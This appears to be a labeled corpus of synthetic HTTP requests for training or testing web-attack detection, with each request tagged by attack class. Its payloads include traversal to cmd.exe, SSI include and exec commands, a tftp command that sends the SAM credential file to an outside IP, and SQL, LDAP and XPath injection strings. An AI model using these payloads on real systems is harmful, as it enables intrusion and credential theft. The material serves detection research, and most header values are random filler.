GET /o_cErBN1I5/hHyc5cb/88ZwKMf/8YlinkzPUOPtNOscriptRy/oYg/rITUaHYs/sriepgRdfdch.tiff?rccRst=tems3oih%27++++or+++++%28i++++%3C+++count%28taxn2%2Fchild%3A%3Atext%28%29%29++++and++++j++%3C+count%28euytei%2Fchild%3A%3Acomment%28%29%29++and+k+++++%3C+count%28oa4eue%2Fchild%3A%3A*%29+%29+or++%27up%27%3D++++%27++++rt9oaTnR%27++++or&ujtet=ohO25n&blijafaxaasas=747078773&97lQR6AFXE=l4UxD&dpideepdfm4SieA=8&fIedgq9wsW=nUyF&sI7tsnpecanInai=362616&tuoe=939659&ii=733&testt7uxed2utq=02 HTTP/1.1
Host: 231.118.201.17:80
Connection: loum4
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.6
Cache-Control: max-age=38
Client-ip: 119.142.72.137
Cookie: ert2hoL=nnheur;mmxUoptV=78;uwhmsotn3o7nsN=315138;vneoEiinzn=u4aZG;5nlJ=053
Cookie2: $Version="5"
Date: Sun, 20 Nov 05 03:36:03 UTC
ETag: "xcInQ_66Zglzx9B"
Expect: 100-continue
From: eslc7@67owp.net
If-Modified-Since: Sat, 14 Jul 07 07:52:09 UTC
If-Unmodified-Since: Thu, 30 Jul 09 11:24:27 UTC
If-Match: "@yXHwM3DCBSwfkMShTb"
If-None-Match: "kjPd5foA5vT_XVe7DJN"
If-Range: Fri, 20 Feb 09 14:42:52 CET
Max-Forwards: 0
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic ZWVic2FsVDp0c2VyZQ==
Authorization: NTLM dGRvc3RubHJtUnJlYXJ0NW9yZWdBZWhtOGRkYWRlYTN5MnBxc2V4
Range: -307462,64-76604
Referer: /fga60ntO/imn03yHt/ttiihoXt/Wasbofr5.avi
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: n0i3B93hl http://www.3et4gh.fr
UA-CPU: x86
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: 2.2 www.cy5ouye.htm, 9.2 www.einiz0.shtml, FTP/8.7 43.45.229.39
Transfer-Encoding: Ctusg
Upgrade: hiv/6.0, 8geb/7.6, ssu82v/5.0
Warning: 968 www.Iurrcesn.jpg "rFd4tdex5ohayei4iC" "Wed, 21 Nov 07 23:43:23 CET"
X-Forwarded-For: 24.251.121.187
X-Serial-Number: 5095784293385
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49871
Start - Id: 44512
class: OsCommanding
GET ..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.loprN.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 174.49.209.68
Cookie: oA6l2zdhopon=433991;stdinJOTmhv6j=2$;ei1onAnsiSnletl=7e2Nscript+dyud9c:ta
Cookie2: $Version="2"
Date: Thu, 27 Aug 09 16:55:46 CET
ETag: W/"HcdXasxzouezv38hXg"
Expect: zfHsd=neeRao
From: aOaort0e@ftfehuiid.cz
If-Modified-Since: Mon, 04 May 09 20:29:35 UTC
If-Unmodified-Since: Sun, 11 Jan 04 21:19:15 CET
If-Match: *
If-None-Match: "6mtLE695gjWc2wdkPTH5"
If-Range: *
Max-Forwards: 61
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="eriil"
Authorization: NTLM RlBFdGF0dDRhYXd6dHYwdW9zZWVjcjdhbjhvbjRhemJuOHVrcWVlUmw=
Range: 7-42
Referer: /rdntk4ee/aEueG/asasc.cgi
TE: gzip;q=0.6
Trailer: Warning
User-Agent: Mozilla/9.4 (Windows; U; Win 9x 8.2; ne-eo; rv:2.2.2) Gecko/38350164
UA-CPU: PowerPC
UA-Disp: 170,4014,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 455x841
Via: HTTP/8.2 189.183.226.152, HTTP/8.6 70.24.243.218, HTTP/9.7 www.edntn.gif
Transfer-Encoding: identity
Upgrade: e50et/1.4
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 80317009323381424111
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44512
Start - Id: 36485
class: OsCommanding
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.obte9b39.biz
Connection: close
Accept: */*
Accept-Charset: windows-1255;q=0.3, iso-10646-ucs-2, x-mac-chinesesimp, iso-8859-9;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=723
Client-ip: 5.230.172.131
Cookie: fttn4ar7aam=smt+>;o1nploqineho=11;e8aserfzOhtcaei=t l1eilikeqoixwe;namhe=00;hsoeorvnkeaEndo=gway9ru;KSrLGO=q
Cookie2: $Version="984"
Date: Tue, 27 Apr 10 09:36:10 CET
ETag: "EEjfH1qoZefe@m2kmR"
Expect: 100-continue
From: n8us@72HjX.ch
If-Modified-Since: Thu, 15 Feb 07 05:51:15 UTC
If-Unmodified-Since: Tue, 17 Jun 08 13:42:44 GMT
If-Match: "BruOo.VZdGlpVJPoS2Y"
If-None-Match: "WV99r78SvCx-jsQKD"
If-Range: Sun, 29 Apr 07 23:18:13 GMT
Max-Forwards: 23
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: iuqrt iwRdnnb=pgerxsn
Authorization: iMny petZeqhm=7afz
Range: 998505-,-0540,815-
Referer: http://e5lr5wb.it/IgdToney/saehbscy/thyi.js
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: e0edcnieIe (ov1qlr; nDnB3Iw; s_k3PnoG4; eunnlN; oT2IizGT)
UA-CPU: Sparc
UA-Disp: 900,140,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1357x6667
Via: 0.1 www.k0idei.gif
Transfer-Encoding: oeEjm
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 183.18.72.245
X-Serial-Number: 5785430371432590
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36485
Start - Id: 40373
class: SSI
GET /5Yerk/dolonevgte.mdb?.sfvq=310445501&ko=609&icaw5iaaeln=560&sratr=7781430&ea2zel738wyimt=aKKnBzz&ahdeicKfSsa=aiaqo%5Ct4ddrEm&tpyisvnsei=r+odgdocumenthmbr&lXQ@Y=dthot&rp=o%2Bb2eafi5eblink%25uhttpe HTTP/1.1
Host: www.eznn.gov
Connection: khrbteo
Accept: video/*, audio/*;q=0.0, audio/x-wav;q=0.0
Accept-Charset: big5;q=0.2, iso-8859-15
Accept-Encoding: deflate;q=0.0, identity;q=0.8, gzip;q=0.2, compress;q=0.6, identity;q=0.7
Accept-Language: <!--   #include     virtual="c:\winnt\system.ini"  -->
Cookie: o0ee1cq1dEl=hynsd4iqlnorysic9
Date: Wed, 14 Feb 07 01:51:07 GMT
If-Match: "VcmBuUrDW_4NMFS3@"
If-None-Match: "hKKuCZbYNxkhv9gMnKf"
Max-Forwards: 5
Pragma: eui2wehi=tae
Referer: /Sut5r/SH3t/rulbE/Oawem2/eilejis.bin
TE: trailers,gzip;q=0.3,trailers
User-Agent: biA6TjzY http://www.lnhpoVrs.ch
Transfer-Encoding: deflate

null

End - Id: 40373
Start - Id: 44647
class: PathTransversal
GET /at1ITubo8OZ1rtoC.d/eaS5-rbcuXpMmbo/ih/stdinuJEu0F/LrcpcatO/N42o9ulsEepaoKoeh/tVMNZeSC.zrZl-1yvd/lhanelseeAkabsrBSlai/i-o-rFMQ0/ryvLx/iIdND/qgHeubeD.msf?7t7alo=iframeJeer%2Baoz%3D%292ua&Eoajtgevhbi=le9&htpass_3zbndroph6wiw=e33AFgQ&irt8n=7026776&bi6NlgnhyAhnwEr=736209032&Nrptn=315599&nhoslhxl=3338341896 HTTP/1.0
Host: www.mqlzdT2gp.net:99609
Connection: it10ge
Accept: image/*;q=0.1, image/*;q=0.0, application/*
Accept-Charset: hz-gb-2312, cp-936;q=0.4, windows-1255;q=0.1
Accept-Encoding: gzip;q=0.9, gzip, gzip;q=0.1, gzip, gzip
Accept-Language: spto-zs1hge, 5hys-oarl, ed3ii-nemD
Cache-Control: only-if-cached
Client-ip: 134.190.203.154
Cookie2: $Version="00"
Date: Fri, 12 Jun 09 02:16:46 GMT
ETag: W/"_VFS2wW67gDZE-6or_"
Expect: 100-continue
If-Modified-Since: Mon, 19 Nov 07 15:58:42 GMT
If-Unmodified-Since: Thu, 22 Jun 06 11:33:35 UTC
If-Match: "-387LhlsqRmot9T9iUp@"
If-None-Match: "viJgeVasVOfl-VJ"
If-Range: "8APMFmleM9M87VN."
Max-Forwards: 471
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM c3BoZW5heWFsZml0ZVRkdDZmOG90b3Mxcmh0ZW50c2FsaGFvc3R6eW9l
Authorization: Basic N3dEaDh0OmE1c2RoN3M=
Range: 04-,-52547
Referer: http://bmbu.ch/n5y9iNd/obeoti.conf
TE: gzip;q=0.2,chunked;q=0.0,trailers
Trailer: Cache-Control
User-Agent: ../../../usr/dsqqdsqsd.xml
UA-CPU: 68000
UA-Disp: 099,001,16
Via: irsvoe/8.0 www.6mtee0.htm:3
Transfer-Encoding: cacN; qehu2=cwrne
X-Serial-Number: 44067592617

null

End - Id: 44647
Start - Id: 40002
class: SSI
GET /oxat8U/ittetmekeo8Sef/7TNqrW8G0aorRcsystemiframew/2E8/QpinLTiqIK-httpBy/wOeei3buenne/aNQfFQG2pQ1h/35BGKEpEUtOe6nD.cfm?owdUcnqc=nwhomehrsoylhtrf&1asiyaenatlmhr0=%3C%21--%23exec+++++cmd%3D%22%2Fbin%2Fls+++-l+++++%2Fhome%2Fssldd7ew%2FdGoyh%22+--%3E&icatimg0K.ZD=9866954&2wrtseEuaedsoS=7349905&ileoirorehKd=tmpit+o&u9q=721 HTTP/1.1
Host: www.eieueh.gov
Connection: etejT
Accept: image/gif;q=0.4, image/png;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.0
Cache-Control: min-fresh=38678
Client-ip: 253.235.28.77
Cookie: astspsa=iv7Q@tiul2o_
Cookie2: $Version="26"
Date: Fri, 01 Jul 05 23:06:53 CET
ETag: W/"yDGjnJnSi2OEj@O9zPi9"
Expect: si3i=ayrD2qe
From: atetgwlh@rphs.com
If-Modified-Since: Thu, 18 Feb 10 08:40:15 CET
If-Unmodified-Since: Sat, 23 Oct 04 08:00:14 UTC
If-Match: "dcIm5kvGygEa88tv9lZ"
If-None-Match: "3cWZDBWeMpko2kshKZO"
If-Range: Wed, 20 Apr 05 10:01:30 UTC
Max-Forwards: 24
MIME-Version: 5.0
Pragma: l=e0oifetL
Proxy-Authorization: Digest qop=auth-int
Authorization: ycset sriu=ednC
Range: 324240-02
Referer: http://l59l.ch/ste1n/pehhlsuh.gif
TE: trailers,trailers,deflate;q=0.4
Trailer: If-Match
User-Agent: aaRu9id (eCI1GiXdkt)
UA-CPU: Sparc
UA-Disp: 2956,4144,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 860x1351
Via: FTP/8.2 221.151.74.10, HTTP/4.0 www.hnsHa.jpeg, HTTP/7.2 160.153.35.253
Transfer-Encoding: deflate
Upgrade: iNatOe/5.8, 1TIi/6.0, rrnz/0.3, ale/7.7
Warning: 490 www.nelmaze.html "8xbzssdeyA" "Sat, 13 Jan 07 10:11:05 GMT"
X-Serial-Number: 18116
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40002
Start - Id: 45222
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: www.s2i7.st
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: 1rwu-tene0n;q=0.0, dadre-r, deen-Tn, lt-b, a1-OPkznti;q=0.3
Cache-Control: nvheztn=sHr
Client-ip: 98.132.36.144
Cookie: assent=to;Gsreret=0333999;nmp=[e;wes=85335;dnn=si h;u1zry2xetn=iuofi
Cookie2: $Version="85"
Date: Wed, 11 Apr 07 20:52:30 CET
ETag: "Fye-r9dja0fSKIbx"
Expect: hslN
From: sgrttcno@xhaofa.gov
If-Modified-Since: Sun, 09 Apr 06 13:49:28 CET
If-Unmodified-Since: Mon, 10 Apr 06 05:19:14 CET
If-Match: "8NKHrVu-PltzuDw"
If-None-Match: "SXfrru3q8yzDd1u2"
If-Range: "sMdrYFbvp5ulpst3DN"
Max-Forwards: 4
MIME-Version: 3.6
Pragma: ife='toyeU'
Proxy-Authorization: Digest qop=evai40
Authorization: Basic QWFlZW9TbzpuaWRyZ2g=
Range: -01750,762-,10389-0
Referer: /eeneeb/ma1e9ts5/auaT.txt
TE: trailers,gzip
Trailer: Expect
User-Agent: iiaACax
UA-CPU: 68000
UA-Disp: 675,5988,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 2272x045
Via: 9.4 150.248.201.188, 5.6 179.191.146.1
Transfer-Encoding: identity
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 50.104.249.90
X-Serial-Number: 706890452941318
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45222
Start - Id: 37075
class: LdapInjection
GET /yeUDv@mgI319aT/VcdN/jliehtholsOapiseoapo/tCFLqMO7WAOhHf.r/eh/t28inpOPsALe/SXscriptckboot.inimps2/oQ3copyJbgsoundAY.css?ToLlE3ZAallJ=t&ehrise=h%28&mesle=s2i6JfUGF13i&zIeqyeTmocha1PGU=%29++%28++++%7C++%28awe%3Di4dfN*%29&rS=obc5eiahavingpassthrut%3F&bteorlodhe=46&vhoDniAt=aosjv88&LLacceptg=745&btlyrRo2it=Rnud HTTP/1.0
Host: www.arjawptsh.st:80
Connection: keep-alive
Accept: audio/basic;q=0.6, video/*;q=0.0
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, gzip, compress;q=0.3, compress;q=0.2
Accept-Language: rxgus-ea;q=0.3
Cache-Control: max-stale
Client-ip: 172.225.76.42
Cookie: oaaoGo3a=enFsfxa;ed8pi=79;geNlrolut=630000523;lauee=$hdrmlqnph-6;cenodeurll7etjR=h4deletedrcphhsemewdo%4lc;0niis30ae9OhtLn=0195800899
Cookie2: $Version="5"
Date: Sun, 06 May 07 10:50:24 UTC
ETag: W/".eEQ4Wr5D0sN1fBRU"
Expect: 100-continue
From: Wtzcle@sDsakEtber.gov
If-Modified-Since: Fri, 04 Mar 05 11:56:58 UTC
If-Unmodified-Since: Fri, 02 Mar 07 12:44:31 CET
If-Match: *
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: *
Max-Forwards: 7209
MIME-Version: 5.2
Pragma: sr7e='yarat1d'
Proxy-Authorization: Digest response="CB0ac9d59ddCF835AdcB7a4b7B71f8fC"
Authorization: wa3fa0 aiaNjca=yhetw5Y
Range: -5
Referer: http://www.viwmov.de/f9hfkiee/rbtee.swf
TE: deflate,trailers,gzip;q=0.0
Trailer: Date
User-Agent: Mozilla/5.5 (Machintosh; U; PPC Mac OS X 0.7; ew-t7; rv:7.2.0) Gecko/77305789
UA-CPU: 68000
UA-Disp: 538,106,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7857x018
Via: 2.1 43.216.152.249
Transfer-Encoding: gzip
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 233 127.78.233.52 "baru8" "Tue, 09 Mar 04 09:31:50 CET"
X-Forwarded-For: 75.212.179.183
X-Serial-Number: 733012895588
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37075
Start - Id: 37529
class: LdapInjection
POST /a9he5Drdueineddrq/baefIthch8iei5iit/e6EygDSSnTS633LG.tiff? HTTP/1.1
Content-Length: 206
Content-Language: wot6s
Content-Encoding: deflate
Content-Location: /opaeoeng/ufssae/me1l.nsf
Content-MD5: RW1vbm9pZ2VDY2Nvc2VqcA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Nov 06 16:11:07 UTC
Last-Modified: Mon, 17 Mar 08 15:28:20 GMT
Host: www.hlvsrge2.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 133.128.23.213
Cookie: r73SokHQ8r=5;tehiy8hEtqe= yg ;a9s8tr7Lnnceq=6
Cookie2: $Version="192"
Date: Thu, 29 Oct 09 12:41:03 GMT
ETag: "eRBcLEPpUSsRmtpuW-pP"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Thu, 23 Sep 04 03:54:05 UTC
If-Unmodified-Since: Fri, 31 Aug 07 15:19:20 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 06 Jan 04 11:55:55 CET
Max-Forwards: 844
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: rertml hneO5=eocht
Authorization: Digest nonce
Range: 0516-7855,069180-,334-
Referer: /aqelim/l4asa/eEvb1/5Rni/eiitDfc.doc
TE: chunked
Trailer: Expect
User-Agent: 1vdiayR5i (l-9Oojmd; rm2aEv; eNblIBRDh; uuJYo0u.@)
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: 5.0 www.ssres.js, lSa6/2.2 242.132.221.129, dxwrlr/0.6 227.190.149.12
Transfer-Encoding: gzip
Upgrade: 6ciYs/4.5, tUt/0.1, hmo/8.6, HPozai/2.7, 4rIvIy/9.5
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~~~

qevotdev1=27&s04t=m9Xnx&caEpls=zaTcu)(&(objectClass   =  Nti*)&tOexs=hcr&l6eEslettynn9=24028&dzat=7- Ov<exmlo3&kOJdropbinNf@kV=)ehde%ud; sF@\er&uznwgmThnas=3(:g&uGfrS=iyenetpijet

End - Id: 37529
Start - Id: 48941
class: XPathInjection
GET /o@ERI/a0l6inPh/tRp1fRM5ItD/SincludeFCaccess_logXrt/eeyrnmrMr1o0dhmoPrlo/cne9ncundgiLa/iLp7jv1/sgxtNhr0_yK/rteueE0iaisuxhRr/eonqesriemtpqgsao/aametpJeche.mspx?UvPx=eBsdchttardl&YDe2C9Ltm=hpositionbvarr%40ri-xanI&enigc8rrHatd=bteoAldmta-&Lltoa3mrdntild=9115434&sat1mrc0e=795291&eietetSltpu=sock_stream+&gtwt3trenftn=sKi%40QrN20il&oi3s9tmbt0Rc=39116&6aarcnueehgaeat=Oo7Dqo%27%5D+++++%7C+++++P+%7C+++%2F%2Fuser%5B+++name%2Ftext%28++++%29+++%3D+++%27hp&umIeh8gaZIsop8=rstxiapesO9n4&m3lAowozft=rsraaeencpaadegei&eetcaepyhjmosO4=337235 HTTP/1.1
Host: 174.108.106.104
Connection: keep-alive
Accept: application/rtf
Accept-Charset: big5;q=0.4, x-mac-korean;q=0.1, iso-8859-15
Accept-Encoding: *
Accept-Language: *
Cache-Control: En=jc
Client-ip: 163.68.137.81
Cookie: ruAiceo=k3syo
Cookie2: $Version="818"
Date: Wed, 10 Sep 08 14:34:47 GMT
ETag: "Wnu8c7V6mR2JtbrB"
Expect: ghd27=dnsedlo;desEue
From: 11ria@soa2e.be
If-Modified-Since: Sat, 20 Mar 04 08:12:22 GMT
If-Unmodified-Since: Tue, 21 Jun 05 06:55:29 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Dec 08 08:38:24 UTC
Max-Forwards: 0449
MIME-Version: 8.7
Pragma: he='a'
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: NTLM OWFoNm51aXR0c3Q5Y25yOWlhdHJzbWlzZWhhc2VOaTBlcw==
Range: 326-470558,-0121
Referer: http://www.tEitae.uk/etiy7ue/epubinWp.jpg
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.3 (Machintosh; U; PPC 8.5; qE-os; rv:3.4.1) Gecko/24268101
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 508x349
Via: FTP/5.1 140.35.34.9, e7waxu/8.0 119.234.193.88, c2em2/0.8 231.195.2.109
Transfer-Encoding: deflate
Upgrade: tgxf/7.7, hudO/8.7, kEn/1.6, souT/0.8
Warning: 129 www.iLdnews.tiff:319 "mv1aiMea" "Wed, 18 Oct 06 24:35:06 CET"
X-Forwarded-For: 9.137.128.106
X-Serial-Number: 6293000915488
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48941
Start - Id: 42387
class: SqlInjection
GET /88_1vpRFpt6CBQ7W/aeon3esacnfai/d8vlAVruN0V.fXI_/hhsmle6f.php?9vCa=9912&oi4hm=arievjrsSronsTA&ZI=ad0t&gidhrAwts9svA=rv6&1rram=6612454455&rZwpatC=00949&iGconnect6=sa&utr3tdenlwy=%27+++OR+++%27wy%27+%3E++%27S HTTP/1.0
Host: 102.88.141.201:8560
Connection: tmiosa
Accept: audio/*;q=0.4
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: rel-n9;q=0.7, Lt-msea;q=0.4, Odeprqmh-ehvotpxE;q=0.7
Cache-Control: only-if-cached
Client-ip: 237.97.207.139
Cookie: hMmihrnnHiimS=weaziugd9ol8uiie;f5nimdd3=o T;tlLxui=1JbQZOX0bwr6;shetae6rhErs=7804
Cookie2: $Version="2"
Date: Wed, 06 Aug 08 22:03:11 GMT
ETag: "6aYSx7Qj5t_MiM6u6aEP"
Expect: 100-continue
From: nU8g@Ctnnlleoe.st
If-Modified-Since: Wed, 23 Jan 08 15:37:51 CET
If-Unmodified-Since: Sun, 13 May 07 10:49:07 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 227
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic UmNucHNycjpwcmVyc3Vi
Authorization: Basic aW5lZEJ0RTpldGdubw==
Range: -012964
Referer: http://sEiehs.net/svef9lT/tkIws6n/i3bq/eylca/enaae.exe
TE: trailers,deflate
Trailer: Warning
User-Agent: Mozilla/2.0 (compatible; Konqueror/9.8; Win 9x; nxkpo96coY; gctceaokUi)
UA-CPU: StrongARM
UA-Disp: 8289,132,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 6.5 15.102.10.152, FTP/3.7 31.11.82.172, 6.4 www.3eztIizt.htm
Transfer-Encoding: deflate
Upgrade: rse/1.1, o5mn/7.6, zlr3/8.8, or7Eaa/3.4
Warning: 999 147.111.219.75 "f2re1Ss" 
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42387
Start - Id: 38249
class: LdapInjection
GET /evE4Zpz7-2/xGvaKPWna8T48aj/bz7Ic4b7RYw0FB6QAAEx/0VwSwA5T/ehamiOheu/vLob./STOtlink28s-e7hopenM_/eobamMJ.sh?70tmpHV7bPfvPd=%28&3hih9=61&9rv2RVRG=680&herc=%29%28+%7C%28odss%3D0oem*%29&accroniEdlTebr=8894&n0irIbMssaU1i=yh&srotthxesd3NhMg=jw&qztu4ie800t=m&zancyis3a0fs=e%26erdhdiode&SGmr9iv0H7n1eo=41968&aRRTl0Q=%3A&wtyErorhpclq=3908&brauoobmnie=o0lM7Zt._n HTTP/1.0
Host: www.huByroooz.net
Connection: clrfqmfe
Accept: audio/*;q=0.0, video/mpeg;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eNlLivd-qeitamlb;q=0.9, bc-rp;q=0.1, 5T-ap32t;q=0.2
Cache-Control: min-fresh=63
Client-ip: 13.61.176.17
Cookie: twabSkpstetnrc=e&ou
Cookie2: $Version="7"
Date: Fri, 12 Oct 07 02:36:43 CET
ETag: W/"ZCbAaSPE6CHjWiXUBqL5"
Expect: 100-continue
From: sohsfM@gllyl.be
If-Modified-Since: Sun, 01 Apr 07 07:07:28 GMT
If-Unmodified-Since: Wed, 17 Jan 07 16:22:41 GMT
If-Match: "z4_QcN@tiYEE4ab9"
If-None-Match: *
If-Range: "6C1HLBIuBwpGix7hAK"
Max-Forwards: 320
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: cnxnn yrrrjyk=idzrBha
Range: -465,47-4
Referer: /fplto/tuK5eag/je3op/rnearln/fuhjeni.tar.gz
TE: trailers,gzip;q=0.0
Trailer: Proxy-Authorization
User-Agent: p1q7sreO/2.0.7.1
UA-CPU: PowerPC
UA-Disp: 8634,303,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 980x990
Via: FTP/5.7 www.b9ws5awY.gif
Transfer-Encoding: gzip
Upgrade: eddcT/3.3, roas/0.6
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 05796287611
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38249
Start - Id: 44609
class: OsCommanding
GET /qWu3W/qWy3YOw5lm/dL_m9sCf4u/hnku/tduwtEft1ybrwhS/8hppMaEwaLaehi/-nDSnph-v@afloggbody/tFw78-7XvNPT4D.J/79FjPKlqLLRHiw2hu@/0lib/lsP/slpus.mdb?q7Ye9hyer80ma=157.13.32.147+++++%7C++tftp++-i+++82.204.122.227+PUT+sam._&Ierb2R6ga=e%40g3Y&tmpLYrmrmSUwaxp_LE=%7Ct3eiei9uaao&efnhhpasI=63039066&rdah7m9To=+%7COt%26T3tcH&n3=ntldsaqdperl&I5iNlfyyhheo=549&HNfgIBm3=283505&erarTconetir=8lmetaer%26n%29usmacthi&iznT=iss4&jdcodristr=etxhtaccesi&anozpkreav=u&E6jbgsound=c%3AaSzh&leeaeno2wc=eysii&Vz7CMI=Olhdgevaphdod0ntar HTTP/1.0
Host: 172.27.107.146:80
Connection: Celse
Accept: */*;q=0.5
Accept-Charset: shift_jis;q=0.2, iso-8859-3, windows-1257, x-mac-turkish, macintosh;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale
Client-ip: 16.16.151.19
Cookie: Csaehdtthkjnhj=802;eci=626936;lmo=7;li5vaeT3sItggeu=10647
Cookie2: $Version="11"
Date: Sun, 14 Mar 10 19:35:05 GMT
ETag: W/"0iYg@SMqR@Wb_t3R"
Expect: 100-continue
From: 8sf9@dbeln5gatO.gov
If-Modified-Since: Sat, 11 Jun 05 01:48:43 CET
If-Unmodified-Since: Thu, 05 Oct 06 12:29:28 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 1.7
Pragma: x='Tav'
Proxy-Authorization: ozleh5 vvuEC=0hotw
Authorization: Ntiork yesrssnr=smegluuc
Range: 41676-
Referer: /tnoney/raI7Ltu/uuhoinI.exe
TE: trailers,trailers
Trailer: Trailer
User-Agent: x_aPH5Os http://www.hotnm.org
UA-Disp: 0488,6492,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/5.3 188.64.121.58
Transfer-Encoding: gzip
Upgrade: oTe/6.3, en2/3.5, hq1ltn/9.0, 9elp1/2.1, Esotly/2.0
Warning: 294 www.eeugeo2c.png "bVo5d8oDShGrt1n" 
X-Forwarded-For: 84.212.52.145
X-Serial-Number: 92326230406152
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44609
Start - Id: 38756
class: LdapInjection
GET /A@k/eAxost0rmmui/ejq48QJHX-di28uRGE-D/prfLmMJD/.dM/iM9Ih-j@TT34bbr1_vSF/tsDJZmE6/rT8sCV3Y/ilmloOMPG0.swf?otNg6aa=oyAyeaccept90ld+ulog+hiframe%3A9eh&NiTusrC=cdivod%5D&he1ylrouoD=0778%29%28%26%28objectClass%3Dstl%29%28%7C%28sn+%3D++++keU%29%28cn%3Dce3t++J*%29%29&neeEmatGms=oeq.I HTTP/1.0
Host: www.neznPMse.org
Connection: 4nsl2y7a
Accept: image/jpeg, application/*, video/*
Accept-Charset: windows-1255, iso-8859-4;q=0.8, x-mac-ce, euc-tw, windows-1257;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: e1-5aesn;q=0.5, gerE-eooehry, a3i-e
Cache-Control: rnd='eecZxi'
Client-ip: 128.109.45.134
Cookie: Etrd=nz;reah0TsoTdl=ded;eOoanxseSeHj=ftstpasswd;Oraofeoh1Xsofob=mlatt o0execrreetl;ecn3AhsgF1sG=i2ra
Cookie2: $Version="4"
Date: Sun, 01 Jul 07 08:06:08 CET
ETag: "b2R@sMIXD.Z0eAZ@-tX"
Expect: 100-continue
From: Dddcd@u4uew8d4.be
If-Modified-Since: Tue, 02 May 06 15:44:31 GMT
If-Unmodified-Since: Sun, 19 Feb 06 14:14:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 37
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=d1acEBc7
Authorization: Basic dGVsYTpxdGNy
Range: -6168,6-
Referer: http://njelS.cz/ws3s/aRsm2Fun/rovs/6eouto/Tq23cg.gif
TE: trailers,chunked,chunked;q=0.0
Trailer: Date
User-Agent: eoemI (mh70nCq)
